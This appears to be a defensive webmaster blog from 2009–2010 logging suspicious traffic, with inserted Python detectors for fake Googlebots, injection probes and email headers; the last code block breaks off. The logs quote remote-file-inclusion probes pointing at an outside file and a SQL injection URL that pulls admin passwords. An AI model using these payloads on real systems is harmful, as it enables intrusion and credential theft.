5/24/2010 8:41:34 AM
62.148.177.239
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) GET
Monday, May 24, 2010
Googlebot imposter - qwest
5/24/2010 2:51:03 AM
97.118.214.144
Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
OK
GET
Googlebot imposter - Scanning for Word Press
5/24/2010 10:04:26 AM
72.10.167.106
http://[domain].com/test/wordpress/wp-login.php
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
GET
Tuesday, May 18, 2010
Google Imposter
Getting traffic from this IP on the planet: 174.132.117.162
Claims to be a google bot: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Doubtful because Google traffic typically comes from Google networks. Additionally the requests are bad.
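One way to test a Googlebot claim like the ones in these entries is the check Google documents: reverse-resolve the source address, require a name under googlebot.com or google.com, then forward-resolve that name and confirm it returns the same address. This is an added example, not code from the original posts; the addresses, PTR names and lookup tables are constructed so it runs offline, and `classify_googlebot_claim` is a hypothetical helper name.

```python
import socket

# Reverse DNS names of genuine Googlebot addresses end in one of these domains.
GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")


def system_reverse(ip):
    """PTR lookup through the system resolver; None when no record exists."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(host):
    """Every address the name resolves to; empty set when resolution fails."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except OSError:
        return set()


def classify_googlebot_claim(ip, user_agent,
                             reverse=system_reverse, forward=system_forward):
    """Classify a request whose User-Agent may claim to be Googlebot.

    The resolver functions are injectable so the logic can be tested
    against fixed data instead of live DNS.
    """
    if "googlebot" not in user_agent.lower():
        return "no-claim"
    host = reverse(ip)
    if not host:
        return "no-ptr"
    host = host.rstrip(".").lower()
    # The leading dot in each suffix matters: "notgooglebot.com" and
    # "googlebot.com.attacker.example" must both fail this test.
    if not host.endswith(GOOGLE_SUFFIXES):
        return "ptr-not-google"
    # Whoever controls an address block controls its PTR records, so a
    # Google-looking PTR proves nothing until the forward lookup agrees.
    if ip not in forward(host):
        return "forward-mismatch"
    return "verified"


# Constructed DNS data (documentation address ranges, invented names).
SAMPLE_PTR = {
    "203.0.113.10": "crawl-203-0-113-10.googlebot.com",
    "198.51.100.7": "host7.isp.example",
    "192.0.2.66": "crawl-203-0-113-10.googlebot.com",   # forged PTR
    "192.0.2.99": "crawl.googlebot.com.attacker.example",
}
SAMPLE_A = {
    "crawl-203-0-113-10.googlebot.com": {"203.0.113.10"},
}
GOOGLEBOT_UA = ("Mozilla/5.0 (compatible; Googlebot/2.1; "
                "+http://www.google.com/bot.html)")


def demo():
    """Run the classifier over the constructed addresses."""
    def forward(host):
        return SAMPLE_A.get(host, set())

    ips = ["203.0.113.10", "198.51.100.7", "192.0.2.66",
           "192.0.2.99", "192.0.2.120"]
    return {ip: classify_googlebot_claim(ip, GOOGLEBOT_UA,
                                         SAMPLE_PTR.get, forward)
            for ip in ips}


if __name__ == "__main__":
    for ip, verdict in demo().items():
        print(f"{ip:15} {verdict}")
```

With the default resolvers the same function can be run against the source addresses in a live access log; cache the verdict per address, since each check costs two DNS lookups.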
Sunday, January 17, 2010
This IP address: 66.232.142.64
Hostway Corporation HOSTWAY-2BLK (NET-66-232-128-0-1)
66.232.128.0 - 66.232.159.255
Hostway-KR HW-66-232-136-22 (NET-66-232-136-0-1)
66.232.136.0 - 66.232.143.255
Is attempting to pass this request parameter to our server:
<_SERVER[DOCUMENT_ROOT]>http://www.kumdo.org/image/banner4.gif???
Kumdo.org resolves to this IP address in Korea:
inetnum: 222.96.0.0 - 222.122.255.255
netname: KORNET
descr: KOREA TELECOM
descr: Network Management Center
country: KR
Monday, November 23, 2009
Bad Headers - Malware, Plugin or?
We're seeing a bunch of requests that look like they were altered and not the original request from the client machine. It could be virus software, malware, proxy servers, caching servers on networks - who knows. Hopefully it is not an evil plugin or someone spying on network traffic.
Here are some of the IP addresses that had this weird header issue recently:
Monday, November 02, 2009
Norton Online Backup
OK I tried Quickbooks/Intuit online backup and that went pretty fast. However somehow a letter in my email got transposed and I had a heck of a time trying to get my data off their system - and someone had previously registered that transposed domain name so not sure if someone actually ripped off the stuff I backed up over there.
I thought I would try an alternate service - Norton Online Backup. I cannot believe how long it takes for this backup service to run compared to the previous service. I can run the thing all night practically and it's not done by morning.
Also the app is a total pig. It eats up tons of memory and bandwidth. Yes, there's a bandwidth throttle so maybe I'll try that. But if I leave the service running and boot up my machine the whole thing grinds to a halt. When trying to use my machine when the service is running it is pretty much unusable.
So, I have to turn off the service and stop the automatic start up and then when I want to run the backup, turn it back on.
Norton really needs to fix these issues if it wants to be a contender in this space.
Monday, October 26, 2009
Errors Trying to Use Windows Update
I was having a strange problem with Word not fully opening even when I maximize the screen. That led me to use Windows Update and got a few errors. Screen shots below.


Monday, October 19, 2009
Bad Traffic - Monitoring (ripping off?) our sites
Traffic from these two networks has been monitoring one of our sites and, I believe, scraping content to rip off or reverse engineer search engine rankings. Check your logs. Block them (if you think it looks fishy like I do).
Rackspace.com, Ltd. RSCP-NET-4 (NET-174-143-0-0-1)
174.143.0.0 - 174.143.255.255
Slicehost RSPC-1251808572434376 (NET-174-143-180-0-1)
174.143.180.0 - 174.143.183.255
Object Software Development SEANET-CBLK (NET-199-181-164-0-1)
199.181.164.0 - 199.181.168.255
Seanet Corporation SEANET01-NET01 (NET-199-181-165-0-1)
199.181.165.0 - 199.181.167.255
Monday, October 12, 2009
Bad Traffic from Korea
Not sure what this nonsense is and how it is even getting directed to our server. The web addresses below are not even on our server, but somehow this showed up in our logs and is generating errors:
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
This is coming from a common spamming/hacking part of the world - Korea:
inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR
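The requests above, like the one in the January 17, 2010 entry, all carry the same query parameter: `_SERVER[DOCUMENT_ROOT]` set to a remote URL, which is the shape of a remote file inclusion probe against PHP applications. The following is an added example, not part of the original posts, that flags such requests in an access log of this format; the sample log lines, addresses and `*.example` hosts are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Matches the log format shown in the post: ip, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A client has no legitimate reason to send parameters with these names.
PHP_SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                    "_FILES", "_ENV", "_REQUEST", "_SESSION"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines modelled on the entries in the post.
SAMPLE_LOG = """\
203.0.113.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://remote.example/shop/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
203.0.113.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://remote.example/shop/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
198.51.100.9 - - [04/10/2009:10:40:02 -0800] "GET /index.php?page=about HTTP/1.1" 200 1843 "-" "Mozilla/5.0" -
198.51.100.9 - - [04/10/2009:10:41:10 -0800] "GET /out.php?url=https://partner.example/ HTTP/1.1" 302 0 "-" "Mozilla/5.0" -
192.0.2.77 - - [04/10/2009:11:02:13 -0800] "GET /app/?GLOBALS[cfg]=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0" -
"""


def classify_request(target):
    """Return (severity, remote_hosts) for one request target.

    "high"   = a parameter named after a PHP superglobal.
    "review" = a remote URL as a value under an ordinary name; this also
               matches legitimate redirect parameters, so it needs a look
               rather than a block.
    """
    _, _, query = target.partition("?")
    severity, hosts = None, set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            try:
                host = urlsplit(value).hostname
            except ValueError:          # malformed authority part
                host = None
            if host:
                hosts.add(host)
            severity = severity or "review"
        # parse_qsl has already percent-decoded "%5B" to "[".
        if name.split("[", 1)[0] in PHP_SUPERGLOBALS:
            severity = "high"
    return severity, hosts


def summarize(lines):
    """Group flagged requests by source address."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        severity, hosts = classify_request(m["target"])
        if severity is None:
            continue
        entry = report.setdefault(
            m["ip"],
            {"high": 0, "review": 0, "remote_hosts": set(), "answered": False},
        )
        entry[severity] += 1
        entry["remote_hosts"] |= hosts
        # A 404 means the probed path did not exist. A high-severity
        # request that was served is the one to investigate first.
        if severity == "high" and int(m["status"]) < 400:
            entry["answered"] = True
    for entry in report.values():
        entry["remote_hosts"] = sorted(entry["remote_hosts"])
    return report


if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG.splitlines()).items():
        print(ip, entry)
```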
Saturday, October 10, 2009
Problems with AT&T Modem Disconnecting
I was having random problems with my AT&T air card disconnecting randomly. Also could not connect at AT&T Hotspots like Starbucks even though supposedly this is included in the service.
I went to the store multiple times to resolve this issue and they called various tech support lines. The tech support people told me to click options and do random things in the AT&T Connection manager that didn't exist for me. I kept telling the people in the store that there is something going on here with the software and maybe I don't have the right version or something. However it was very difficult to troubleshoot because they don't HAVE a hotspot in the AT&T stores I went to which I think is kind of ridiculous. It is an easy thing to do and can easily help customers troubleshoot...so I walked down to the Starbucks down the street and the guy from the store was going to go down there and meet me to figure it out...after spending a good deal of time trying to get ahold of tech support already. Of course we'd have to drop the phone call with tech support to do this, and being a software engineer / tech person, I was not convinced this was going to work because it really seemed like the AT&T store personnel did not have the needed information or understanding of this software and service to resolve the problem.
I went to the Starbucks and of course waited so long there my laptop battery died before the AT&T person got there - and since I was not convinced this would work I gave up. I am busy so I just worked with the AT&T card as is for a while - until it dropped connections so many times at a hotspot it was driving me nuts. So...I got the little brochure at Starbucks and called the number on the back and sat on hold forever. Because I am persistent when I actually want to solve a problem. Finally got a guy and in about two seconds he tells me I have old software and I need to contact AT&T Mobility.
The software update in my AT&T connection manager obviously isn't working (version 6.5.7.0). So I asked him for the phone number to call (thank god) before he transferred me. And of course when he transferred me the call failed and I had to go through 3 or 4 menus and wait on hold again to get to someone, who finally directed me to the page with the update for the AT&T software for my air card.
Questions:
1. WHY AT&T can you not make these software updates easily available on your web page where you have information about my products and services and probably can even have a button to click to see if my software is up to date or not?
2. And WHY AT&T can you not inform your staff in your stores this one simple thing - how to update software associated with your various products.
3. And PLEASE, WHY AT&T don't you run hotspots in your stores to help customers resolve these issues in a few minutes rather than hours, weeks, days....frustration.
Just a suggestion!!
Strange Traffic in Logs - a bunch from Canada
There is something bizarre going on in our logs. It is interesting that the first of such links comes from aQuantive - now Microsoft advertising.
We have a site that is running some Google advertising supposedly (did not set this up myself). There is a bunch of traffic - all from different networks in Canada - where these visitors hit that ad landing page, then jump over to another web site on our server.
Not sure if they are attempting to hack the form and ending up on the wrong page, or if some other weird thing is going on.
For this particular company, it is highly unlikely that 10 or 20 visitors per day in Canada are clicking on their ads legitimately (if that is in fact the source).
Additionally there are strange Google redirect links in our logs, and a lot of searches in Google.ca (Google Canada) that are ending up at this site.
Seems like some funny business but cannot quite figure out what they are trying to do.
One thing I noticed is that initial attempts at this type of traffic were coming from international locations other than Canada, some of which we have blocked. Perhaps because they cannot get to the site via these locations they set up shop in Canada and attempt to access our site through some weird redirect through a form. Will have to keep looking into that.
The traffic started on September 1st 2009. Here are the IP addresses involved:
Sunday, September 20, 2009
Mining Tax Shelter
This was sent to one of our customers - probably illegal or some kind of scam.
Hello,
My name is George Deden and I am President of Glacier Valley Mining and Metals. We have an opportunity for your company while assisting us in our company goals. We are seeking a company that is proactive and responsive to their client's needs and one that has a data base of potential investors in our IRS registered tax shelter. We are seeking a company to place these investment units. The IRS provides for a fee for placement of these units. This is an active involvement and not a passive investment. Please visit our web site at www.gvmtaxshelter.com for further information.
This mining tax shelter is for those who receive no benefit from the current economic stimulus package, and for those who will see their tax rates go higher in the future. This also provides the investor with a three to one write off with a potential three to one return.
Simply put this is not a gamble. It is an opportunity. We value gold at $400.00 per ounce. We are the source. For example if you bought a head of lettuce at the market and paid two dollars for it - that is what it cost. If you go to the wholesaler you can get it for a dollar fifty, but if you go to the source (farmer) you can get it for a dollar a head. We are the source.
Best Regards, George Deden
President, GVMM
562-400-0411
gjdeden@gvmtaxshelter.com
___
Came from this IP: 66.91.83.205
OrgName: Road Runner HoldCo LLC
OrgID: RRWE
Address: 13241 Woodland Park Road
City: Herndon
StateProv: VA
PostalCode: 20171
Country: US
ReferralServer: rwhois://ipmt.rr.com:4321
NetRange: 66.91.0.0 - 66.91.255.255
Saturday, September 19, 2009
Strange referrer - stream://1/ - speakeasy network
We're getting some strange traffic from this URL: stream://1/
The traffic is coming from the Speakeasy network: 216.231.44.147
Speakeasy, Inc. SPEAKEASY-1 (NET-216-231-32-0-1)
216.231.32.0 - 216.231.63.255
Speakeasy Network -- DSL SPEK-DSL-BR1-1 (NET-216-231-42-0-1)
216.231.42.0 - 216.231.50.255
Bad Traffic - Hurricane Electric (again)
Seems like we often get mysterious traffic from Hurricane Electric. In this case, traffic from the network below is attempting to access non-existent shopping carts on our system:
Hurricane Electric, Inc. HURRICANE-4 (NET-65-19-128-0-1)
65.19.128.0 - 65.19.191.255
EGIHosting HURRICANE-CE1290-5430 (NET-65-19-129-16-1)
65.19.129.16 - 65.19.129.31
BSNEWLINE BSNEWLINE-1 (NET-65-19-129-16-2)
65.19.129.16 - 65.19.129.31
Thursday, September 03, 2009
Weird Job Proposals from Mary Kay
Getting proposals to work for a job and wondering if this is legit.
The email is supposedly from MaryKay but I always get responses in the middle of the night at like 3 a.m.
They don't respond to the emails correctly and when I said I'm still not interested they keep trying to get reference contact information and personal details.
Maybe it's legit, I'm not sure. Just kind of weird.
Delivered-To:
Received: by 10.142.193.11 with SMTP id q11cs69747wff;
Thu, 3 Sep 2009 03:17:50 -0700 (PDT)
Received: by 10.90.22.18 with SMTP id 18mr7054118agv.20.1251973069978;
Thu, 03 Sep 2009 03:17:49 -0700 (PDT)
Return-Path:
Received: from psmtp.com (exprod7mx164.postini.com [64.18.2.69])
by mx.google.com with SMTP id 21si1589296agb.25.2009.09.03.03.17.47
(version=TLSv1/SSLv3 cipher=RC4-MD5);
Thu, 03 Sep 2009 03:17:48 -0700 (PDT)
Received-SPF: pass (google.com: domain of marykayincorporated@gmail.com designates 64.18.2.69 as permitted sender) client-ip=64.18.2.69;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of marykayincorporated@gmail.com designates 64.18.2.69 as permitted sender) smtp.mail=marykayincorporated@gmail.com; dkim=pass (test mode) header.i=@gmail.com
Received: from source ([209.85.220.166]) by exprod7mx164.postini.com ([64.18.6.14]) with SMTP;
Thu, 03 Sep 2009 06:17:48 EDT
Received: by fxm10 with SMTP id 10so442739fxm.1
for <>; Thu, 03 Sep 2009 03:17:46 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:mime-version:sender:received:in-reply-to
:references:date:x-google-sender-auth:message-id:subject:from:to
:content-type:content-transfer-encoding;
bh=CwZNcLXFIGZyzEfPyjZIHI56PCgsgs0XqS2STBQhGb8=;
b=Y+UooH+6VyEsb8BcIupC0QT1z9oaKkZei4wShf7jXTM9jH8uMCayulyoh7Mgt0JFqg
BpQ8Qtw2XYIrSHvS6XglNbBIMIiJCxGRU/WZFq21wdBxNYQ9Qx3Ihe8UQ6lgF+s4Zqjk
fOlAFlynC3JtUGqFc18PJ03wInW39Bjm/O/KA=
DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=mime-version:sender:in-reply-to:references:date
:x-google-sender-auth:message-id:subject:from:to:content-type
:content-transfer-encoding;
b=LTSsjxvD9obo6MC4hhzER9fu0fGotOZSBMgNoiDdD2wgGlCovm+pdGMuP8zF1KrnaB
zoPsUI/ZH+LNl5n7xCab/58IbFo2iHhBPNM4J2cWvEuJ/rH8fh8RtWh5n4i6UWUhE9gB
48P3UidlIUOt+pO+k2xPa4UWrb1588N5GYa9o=
MIME-Version: 1.0
Sender: marykayincorporated@gmail.com
Received: by 10.204.8.21 with SMTP id f21mr7791449bkf.129.1251973066018; Thu,
03 Sep 2009 03:17:46 -0700 (PDT)
In-Reply-To: <7259BF6AEF584DF99A9C756D39D02220@>
References: <62166.64.12.112.193.1251693960.squirrel@gator985.hostgator.com>
<7259BF6AEF584DF99A9C756D39D02220@>
Date: Thu, 3 Sep 2009 11:17:44 +0100
X-Google-Sender-Auth: ec55662c1fd1dfa6
Message-ID: <9a93579d0909030317q7bee570ft5a5befd8ced8b03b@mail.gmail.com>
Subject: Re: Notice of Shortlistment for Vacant Position at Mary Kay Inc
From: Human Resources Department
To:
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
X-pstn-neptune: 0/0/0.00/0
X-pstn-levels: (S:19.46979/99.90000 CV:99.9000 FC:95.5390 LC:93.6803 R:95.9108 P:95.9108 M:97.0282 C:98.6951 )
X-pstn-settings: 1 (0.1500:0.1500) cv gt3 gt2 gt1 r p m c
X-pstn-addresses: from [447/28]
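What the headers above do and do not prove, as an added example (not part of the original post): spf=pass and dkim=pass only say the message really came through gmail.com, not that it came from the company named in the subject. The message below is constructed from the header values shown in the post, with a placeholder From address because the post's copy has it stripped; the brand-to-domain table and the free-mail list are analyst-supplied assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message. Header values are the ones shown in the post; the From
# address is a placeholder because the post's copy has the address stripped.
RAW = (
    "Authentication-Results: mx.google.com; spf=pass (google.com: domain of "
    "marykayincorporated@gmail.com designates 64.18.2.69 as permitted sender) "
    "smtp.mail=marykayincorporated@gmail.com; dkim=pass (test mode) "
    "header.i=@gmail.com\n"
    "Sender: marykayincorporated@gmail.com\n"
    "Subject: Re: Notice of Shortlistment for Vacant Position at Mary Kay Inc\n"
    "From: Human Resources Department <placeholder@example.invalid>\n"
    "\n"
    "(body omitted)\n"
)

# Analyst-supplied assumptions, not data from the post: which domains a named
# organisation sends from, and which domains anyone can register a mailbox at.
BRAND_DOMAINS = {"mary kay": {"marykay.com"}}
FREEMAIL = {"gmail.com", "yahoo.com", "hotmail.com", "aol.com"}


def authenticated_domains(msg, trusted_authserv):
    """Domains that passed SPF/DKIM per our own server's Authentication-Results."""
    passed = {}
    for header in msg.get_all("Authentication-Results", []):
        header = re.sub(r"\([^()]*\)", "", header)   # strip (comments)
        authserv, *clauses = header.split(";")
        if authserv.strip().lower() != trusted_authserv:
            continue                                 # a sender can add its own copy
        for clause in clauses:
            method = re.match(r"\s*(spf|dkim)\s*=\s*(\w+)", clause, re.I)
            ident = re.search(r"\b(?:smtp\.mail(?:from)?|header\.[id])=(\S+)", clause)
            if method and ident and method.group(2).lower() == "pass":
                domain = ident.group(1).rsplit("@", 1)[-1].lower()
                passed[method.group(1).lower()] = domain
    return passed


def assess(raw, trusted_authserv="mx.google.com"):
    """Compare who the message says it is with who it was authenticated as."""
    msg = message_from_string(raw)
    display_name, _ = parseaddr(msg.get("From", ""))
    claimed = f"{display_name} {msg.get('Subject', '')}".lower()
    auth = authenticated_domains(msg, trusted_authserv)
    domains = set(auth.values())
    flags = []
    for brand, own in sorted(BRAND_DOMAINS.items()):
        matches = any(d == o or d.endswith("." + o) for d in domains for o in own)
        if brand in claimed and not matches:
            flags.append(f"brand_mismatch:{brand}")
    flags += [f"freemail_sender:{d}" for d in sorted(domains & FREEMAIL)]
    return {"authenticated": auth, "flags": flags}


if __name__ == "__main__":
    print(assess(RAW))
```

Only the Authentication-Results header written by your own receiving server counts, which is why the check is keyed on the authserv-id.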
Wednesday, September 02, 2009
Norton Online Backup - Not Good
I switched from Intuit online backup which was ridden with security problems and support staff in or from India that clearly had no clue what they were talking about, to Norton online backup. I was hoping for better security.
I am not sure if the security is good but it doesn't matter because I cannot get Norton Online Backup to even back up all my files. I paid for the extra storage and I run the backup service for hours at a time - I've run it overnight a couple of times - and it always errors out or just never finishes.
Whatever Norton Online Backup is doing is not efficient, that much is for sure. They must be restarting the entire backup when it fails mid stream or something and not tracking what has and has not already been backed up and/or what has changed because it has NEVER finished!
Additionally it seems they are not doing any type of file compression because it should not be taking this long.
My only hope is that my backups are not being somehow diverted to some slower network or third party that is causing this problem.
I would try Amazon backup services but there has been so much hacker traffic coming from their networks hitting our servers I don't trust that whole S3 network or whatever it is.
When is someone, anyone, going to create a TRULY secure and efficient backup service where the people supporting it cannot get into it, change the accounts to create a copy of the backups, or see the files...and has all the appropriate auditing to keep things secure on an on-going basis.
I hope someone at Norton Online Backup reads this at a higher level because I'm sure calling the support staff is going to send me to some low level tech support person that will be annoying to talk to. Maybe I will try that when I have more time and a day to waste on the phone. Why can't anything just work?
Tuesday, September 01, 2009
GoDaddy Hacking - Same as my last post
Same as the last post, a server with an old browser apparently has record of all the pages in a particular site and is scanning it, even though the software scanning the site cannot actually see the pages - they are blocked.
Clearly this is some kind of software copying our site or at least all the links in it again most likely for nefarious reasons.
IP Address: 72.167.94.65
OrgName: GoDaddy.com, Inc.
OrgID: GODAD
Address: 14455 N Hayden Road
Address: Suite 226
City: Scottsdale
StateProv: AZ
PostalCode: 85260
Country: US
NetRange: 72.167.0.0 - 72.167.255.255
Dow Jones-Telerate: Copying our Web Site?
Getting some suspicious traffic from this network. Even after blocking them they are somehow able to scan every page in our site which tells us that basically they took a copy of the site and all the URLs in it. They cannot currently link from page to page because they are blocked, so obviously storing a copy of the whole site in a database somewhere.
We have contacted this network but the suspicious traffic continues. One of the email addresses in the whois information bounced.
Additionally the traffic is coming from an IE6 browser which generally (not always) indicates the work of a hacker or malware.
205.203.134.197
OrgName: Dow Jones-Telerate
OrgID: DOWJON
Address: 4300 North Route 1
Address: Bldg. 1
City: South Brunswick
StateProv: NJ
PostalCode: 08852
Country: US
NetRange: 205.203.96.0 - 205.203.159.255
Tuesday, August 25, 2009
Old Browsers in Logs - Hackers
I would like to reject all old browsers that come to our site from Google advertising or otherwise. Looking at the networks that these old browser visitors come from, it is pretty clear that 99% of them are bots, software or competitors.
I wish Google would do something about this like disallowing ads for old, insecure browsers like IE6.
Friday, August 14, 2009
Microsoft Office 2007 is crap.
I just went to print a document on a friend's computer. I use a previous version of Office. My friend had 2007 but she never used it yet (not computer savvy). After using Word for over 15 years you think I would be able to figure out where they moved the print button. The UI is so ridiculous it took up five minutes searching around to find the stupid print icon.
FILE. PRINT.
Every other piece of software copied this model because everyone is used to it.
Whoever changed this is an idiot. Sorry. They are.
A huge loss of productivity in every office where every person that gets this the first time has to take 5 minutes (or longer if not computer savvy) to figure out how to print a document in Office 2007.
So if you're thinking of getting Office 2007 - consider that was just the print button. How many other things are your employees going to be trying to find and wasting time?
Why, Microsoft? Why?????
Monday, August 10, 2009
Slicehost - Bad Traffic
We seem to be getting a lot of bad traffic from the slicehost IP range.
OrgName: Slicehost LLC
OrgID: SLICE
Address: 4579 Laclede Avenue #258
City: St. Louis
StateProv: MO
PostalCode: 63108
Country: US
NetRange: 67.207.128.0 - 67.207.159.255
ThePlanet.com - bad traffic
Getting a lot of bad traffic from this network:
OrgName: ThePlanet.com Internet Services, Inc.
OrgID: TPCM
Address: 315 Capitol
Address: Suite 205
City: Houston
StateProv: TX
PostalCode: 77002
Country: US
ReferralServer: rwhois://rwhois.theplanet.com:4321
NetRange: 174.132.0.0 - 174.133.255.255
Amazon cloud traffic
After a bunch of odd traffic from the Amazon "elastic cloud" networks searching for pages that don't exist on our sites, one site's search engine rankings have dropped.
Coincidence, I don't know.
I do know that the Amazon traffic was bad and we've seen bad traffic from Amazon before.
Sunday, August 09, 2009
Google Imposter
A Google Imposter hit our sites today from this IP: 64.69.46.216
On this network:
OrgName: CoreExpress
OrgID: COEX
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US
NetRange: 64.69.32.0 - 64.69.47.255
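One way to confirm or reject a Googlebot claim without relying on whois, as an added example (not code from this blog): a forward-confirmed reverse DNS check. The accepted suffixes are an assumption based on the domains Google documents for Googlebot, and the addresses and host names in the offline tables are constructed.

```python
import socket

# Suffixes accepted for a genuine crawler PTR record (assumption: the two
# domains Google documents for Googlebot; confirm against Google's current list).
GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")


def system_reverse(ip):
    """PTR lookup via the system resolver; None when there is no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(host):
    """Set of addresses the host name resolves to (empty on failure)."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except OSError:
        return set()


def classify(ip, user_agent, reverse=system_reverse, forward=system_forward):
    """Forward-confirmed reverse DNS check for a client claiming to be Googlebot."""
    if "googlebot" not in user_agent.lower():
        return "no-claim"
    host = reverse(ip)
    if not host:
        return "imposter:no-ptr"
    host = host.rstrip(".").lower()
    if not host.endswith(GOOGLE_SUFFIXES):
        return "imposter:ptr-outside-google"
    # The owner of an address block controls its PTR records, so the name
    # only counts if it also resolves back to the same address.
    if ip not in forward(host):
        return "imposter:forward-mismatch"
    return "verified"


# Constructed DNS data (documentation addresses, made-up host names) standing
# in for the resolver so the demonstration runs offline.
FAKE_PTR = {
    "192.0.2.1": "crawl-192-0-2-1.googlebot.com.",
    "198.51.100.9": "host9.hosting.example.",
    "203.0.113.20": "crawl-203-0-113-20.googlebot.com.",  # PTR with no matching A record
}
FAKE_A = {"crawl-192-0-2-1.googlebot.com": {"192.0.2.1"}}
UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def demo():
    """Classify each constructed client using the fake resolver tables."""
    clients = ["192.0.2.1", "198.51.100.9", "203.0.113.20", "203.0.113.99"]
    return {ip: classify(ip, UA, FAKE_PTR.get, lambda h: FAKE_A.get(h, set()))
            for ip in clients}


if __name__ == "__main__":
    for ip, verdict in demo().items():
        print(f"{ip:15} {verdict}")
```

Called with only an IP and a user agent, classify() uses the system resolver, so it can be pointed at addresses pulled from the web logs.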
Friday, August 07, 2009
ValueWeb and DomainPeople
If you register and host your site at Value Web (becoming Hostway) you will have a very difficult time getting your domain off their systems later, should you need to do that.
Be prepared to call 5 or 6 times, wait on hold eternally, and get a lot of inaccurate information.
You have been warned.
Wednesday, August 05, 2009
AOL Proxy Cache
I noticed this IP and related IPs were hitting our sites a ton:
207.200.116.13
A reverse look up of the domain shows this IP is:
cache-ntc-aa09.proxy.aol.com
I'm personally not a fan of other networks caching and hosting our content. That's bad for us because we cannot accurately track who hit our site when and how they found us.
This may be some email related cache but we'd also like to see those image hits if possible.
As far as I can tell this is not a positive thing for our site except to reduce bandwidth - but that's bad if we cannot tell who viewed the images in the mail so we can accurately measure email campaigns.
Thursday, July 16, 2009
More PHP Hacker Traffic
We're seeing some hacker traffic from this network attempting to access this url:
/profile.php?name='+UNION+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+webl_admin%23
CustName: Alwatan Newspaper
Address: Unknown
City: Muscat
StateProv: Oman
PostalCode:
Country: OM
RegDate: 2008-07-10
Updated: 2008-07-10
NetRange: 216.7.173.16 - 216.7.173.31
CIDR: 216.7.173.16/28
NetName: D393-ENG01-216-7-173-16-28
NetHandle: NET-216-7-173-16-1
Parent: NET-216-7-160-0-1
NetType: Reassigned
Comment:
RegDate: 2008-07-10
Updated: 2008-07-10
OrgAbuseHandle: DAM96-ARIN
OrgAbuseName: Data393 Abuse Manager
OrgAbusePhone: +1-303-268-1500
OrgAbuseEmail: abuse@data393.net
OrgNOCHandle: DNOC2-ARIN
OrgNOCName: Data393 Network Operations Center
OrgNOCPhone: +1-303-268-1500
OrgNOCEmail: noc@data393.net
OrgTechHandle: IPADM77-ARIN
OrgTechName: IP Administration
OrgTechPhone: +1-303-268-1500
OrgTechEmail: ip-addr@data393.net
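Detection logic for the probe URL in this post, which the "hacker - phpadmin" post reports again with user agent libwww-perl/5.811, as an added example (not code from this blog). It decodes each query string, flags the UNION SELECT pattern, and groups identical decoded payloads so the same probe arriving from several networks shows up as one campaign. The log entries and IP addresses are constructed; only the probe URL and the perl user agent come from the page.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

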